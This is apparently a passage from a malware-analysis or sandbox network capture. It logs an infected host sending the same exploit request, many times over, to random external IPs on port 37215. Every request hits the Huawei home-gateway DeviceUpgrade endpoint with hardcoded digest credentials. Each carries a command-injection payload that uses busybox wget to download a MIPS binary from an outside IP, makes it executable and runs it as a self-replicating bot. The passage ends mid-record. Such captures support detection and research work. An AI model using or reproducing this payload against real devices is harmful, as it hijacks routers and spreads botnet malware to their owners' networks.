                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2168192.168.2.1333548197.185.52.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728297949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2169192.168.2.1338684197.122.43.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728329897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2170192.168.2.1350932197.103.97.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728348970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2171192.168.2.134762041.103.60.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728364944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2172192.168.2.1342836157.28.238.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728384018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2173192.168.2.134357841.121.11.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728557110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2174192.168.2.133971841.216.76.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728568077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2175192.168.2.1334548157.29.35.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728573084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2176192.168.2.1334890179.228.109.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728621960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2177192.168.2.1337718197.177.5.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.728626966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
